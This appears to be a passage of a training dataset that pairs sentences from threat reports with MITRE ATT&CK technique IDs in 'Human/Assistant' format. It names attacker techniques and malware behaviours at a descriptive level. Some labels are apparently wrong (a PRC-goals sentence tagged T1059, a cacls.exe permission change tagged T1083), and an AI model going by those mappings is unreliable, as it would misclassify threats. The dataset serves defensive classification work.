Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Any application or user with write permissions to the file can change or strip the quarantine flag.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The observation of the signal packets to trigger the communication can be conducted through different methods.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi decrypts the configuration data using XOR with 25-character keys.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used scheduled tasks to install TrickBot, using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee's service-based DLL implant traverses the FTP server’s directories looking for files with keyword matches for computer names or certain keywords.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi uses a backup communication method with an HTTP beacon.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability .### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Looking at earlier attacks between 2013 and 2016, we believe Comnie was also used in targeted attacks against the following individuals or organizations: Taiwan government IT service vendor in Asia Journalist of a Tibetan radio station Figure 6 Email sent to Journalist of Tibetan radio station   Malicious Macros The malicious macro documents used to deliver Comnie initially hide the content inside and requests that the user enables macros prior to viewing the document### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has collected the hostname, OS version, service pack version, and the processor architecture from the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Panda has used regsvr32.exe to execute a server variant of Derusbi in victim networks.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec has a plugin to detect active drivers of some security products.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware gathers the registered user and primary owner name via WMI.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The at command within Linux operating systems enables administrators to schedule tasks.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some adversaries may also use Automated Collection on removable media.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos can remove all command history on compromised hosts.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather this information in various ways, such as querying or otherwise collecting details via DNS/Passive DNS.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Word Normal.dotm location:
C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm Excel Personal.xlsb location:
C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TINYTYPHON has used XOR with 0x90 to obfuscate its configuration file.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commercial software may be obtained through purchase, stealing licenses , or cracking trial versions.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Links may also lead users to download files that require execution via Malicious File.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CPL files not exporting CPlApplet are not directly executable.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has detected a target system’s OS version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot will delete itself if a certain server response is received.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used Metasploit to perform reflective DLL injection in order to escalate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique does not write any data to disk.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can collect information about installed software used by specific users, software executed on user login, and software executed by each system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RunningRAT contains code to delete files from the victim’s machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can move laterally using worm-like functionality through exploitation of SMB.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 has established persistence by using the Registry option in PowerShell Empire to add a Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc gathers product names from the Registry key: HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName and the processor description from the Registry key HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RobbinHood deletes shadow copies to ensure that all the data cannot be restored easily.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TinyZBot contains keylogger functionality.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Threat Group-3390 tool can add the binary’s path to the Registry key Software\Microsoft\Windows\CurrentVersion\Run to add persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet uses a Windows rootkit to mask its binaries and other relevant files.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has executed commands via cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Flame can use Windows Authentication Packages for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse IPC to execute arbitrary code or commands.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBferry can collect information from an air-gapped host machine.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can also change file permissions using cacls.exe.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI is a RAT that is believed to have  been in use for over four years, with a wide array of functionalities, often leveraging free web hosting providers like 000webhost for its C2 infrastructure### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The document also contained a lure image, similar to ones commonly found in malicious macro documents which ask the user to click on “Enable Content” as seen in Figure 2### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These policies allow administrators to set local accounts.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky can compress files via RAR while staging data to be exfiltrated.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has disguised malicious installer files by bundling them with legitimate software installers.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise is capable of launching a remote shell on the host to delete itself.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has cloned victim organization login pages and staged them for later use in credential harvesting campaigns.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Microsoft’s Office Open XML specification defines an XML-based format for Office documents to replace older binary formats .### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger has the ability to identify installed anti-virus products on a compromised host.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSInfo discovers information about the infected machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIVEHANDS can receive a command line argument to limit file encryption to specified directories.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can search for network shares on the domain or workgroup using net view .### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon has searched for files on the system, such as documents located in the desktop folder.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT28 backdoor may collect the entire contents of an inserted USB device.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linfo creates a backdoor through which remote attackers can retrieve a list of running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike's ""beacon"" payload is capable of running shell commands without cmd.exe and PowerShell commands without powershell.exe APT37 leverages the Windows API calls: VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process injection.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These mechanisms can also be abused to run a process under the context of a specified account .### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat can be issued a command shell function from the C2.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.### Assistant: T1619: Cloud Storage Object Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used PowerShell to drop and execute malware loaders.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used UPX to pack files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET saves a screen capture of the victim's system with a numbered filename and .jpg extension.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 obtained a list of users and their roles from an Exchange server using Get-ManagementRoleAssignment.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Observed vulnerabilities include: CVE-2012-0158 CVE-2017-0199 CVE-2017-8759 CVE-2017-11882 Figure 2: APT40 attack lifecycle Establish Foothold APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can query the netsvc group value data located in the svchost group Registry key.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,email with an embedded tracking link### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hi-Zor encrypts C2 traffic with TLS.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A virtual machine is then called to run this code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can insert pseudo-random characters into its network encryption setup.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This differs from Steal Application Access Token and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs will decode malware components that are then dropped to the system.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer can disable Gatekeeper using the native spctl application.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has registered malicious domains for use in intrusion campaigns.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee uses a combination of NTWDBLIB.dll and cliconfg.exe to bypass UAC protections using DLL hijacking.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy has included a program ""ExeProtector"", which monitors for the existence of GoldenSpy on the infected system and redownloads if necessary.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORESHELL obfuscates strings using a custom stream cipher.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The cab file was encrypted and decrypted using a simple xor cipher with a rotating 16 byte key: \x36\x11\xdd\x08\xac\x4b\x72\xf8\x51\x04\x68\x2e\x3e\x38\x64\x32### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT19 HTTP malware variant establishes persistence by setting the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a Trusted Relationship.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has base64-encoded its portable executable and hidden itself under a JPG header.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location, Internet service provider, and or where/how their publicly-facing infrastructure is hosted.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has also used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware can list running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are two forms of encrypted strings: an RSA256-encrypted string, and custom base64-encoded and RSA256-encrypted string### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Netwalker DLL has been injected reflectively into the memory of a legitimate running process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Technical Databases, establishing operational resources or Obtain Capabilities, and/or for initial access or External Remote Services.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has communicated to hard-coded IP addresses via HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE compresses collected files with GZipStream before sending them to its C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy runs the ipconfig /all command.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Both “%APPDATA%\\Microsoft\Windows\Cookies.txt” and “%APPDATA%\\Microsoft\Windows\Cookies.exe” are then deleted### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used PowerShell to download and execute payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak encrypts the message body of HTTP traffic with RC2 .### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has sent user and system information to a C2 server via HTTP POST requests.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orz has used Technet and Pastebin web pages for command and control.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL has used an OLE object that uses Equation Editor to drop the embedded shellcode.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework., net group ### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can gain persistence through use of scheduled tasks.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya encrypts user files and disk structures like the MBR with 2048-bit RSA.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex can wipe deleted data from all drives using cipher.exe.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orz can gather victim proxy information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once encrypted, the system information is sent in the body of an HTTP POST### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DLL side loading has been used to maintain persistence on the compromised system### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A wide variety of infrastructure exists for hosting and orchestrating adversary operations.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak installs VNC server software that executes through rundll32.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth captures and DES-encrypts credentials before writing the username and password to a log file, C:\log.txt.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An account can hold additional SIDs in the SID-History Active Directory attribute , allowing inter-operable account migration between domains .### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used encoded PowerShell commands.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information can help adversaries determine which accounts exist to aid in follow-on behavior.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has exfiltrated data over its email C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unknown Logger is capable of downloading remote files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackMould can enumerate local drives on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLASHFLOOD searches for interesting files on the local system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Capabilities can also be staged on web services, such as GitHub or Pastebin.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has gained execution through users opening malicious links.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,adbupd can use a WMI script to achieve persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer can use the chmod utility to set a file as executable, such as chmod 777 or chmod +x.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also added additional permissions to compromised Application or Service Principals.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 4: Embedded URL in OLE object Figure 5: HTTP GET request to download the next level payload The downloaded file, doc.doc, is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary Pause.ps1### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about hosts may include a variety of details, including administrative data as well as specifics regarding its configuration .### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MechaFlounder has the ability to use base16 encoded strings in C2.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can listen in to victims' conversations through the system’s microphone.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER's MSGET downloader uses a dead drop resolver to access malicious payloads.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may purchase domains that can be used during targeting.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has a command to disable routing and the Firewall on the victim’s machine.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 created new Windows services and added them to the startup directories for persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,China Chopper's server component is a Web Shell payload.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can place a lnk file in the Startup Folder to achieve persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HiddenWasp encrypts its configuration and payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLATINUM has renamed rar.exe to avoid detection.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has installed TeamViewer on targeted systems.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER is written in PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShell File Analysis The PowerShell script employs several layers of obfuscation to hide its actual functionality### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used the VPS infrastructure of compromised Iranian threat actors.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy modifies conditions in the Registry and adds keys.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM exploited a publicly-facing servers including Wildfly/JBoss servers to gain access to the network.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse various implementations of JavaScript to execute various behaviors.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT can capture images from webcams on compromised hosts.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has created and granted privileges to domain accounts.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leveraging Existing Windows Services to Deliver Malware Windows Management Instrumentation Console (WMIC) provides a command line interface to WMI### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since it is a very long term group, some victims may be impossible to identify now### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This version of the campaign made malicious use of unins000.exe, a process that belongs to the Brazilian information security company GAS Tecnologia, to gather personal information undetected### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck encrypts the victims machine followed by asking the victim to pay a ransom.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows Registry stores configuration information that can be used by the system or other programs.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has masqueraded as legitimate software including TeamViewer and macOS Finder.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, SMB/Windows Admin Shares, or Windows Remote Management.### 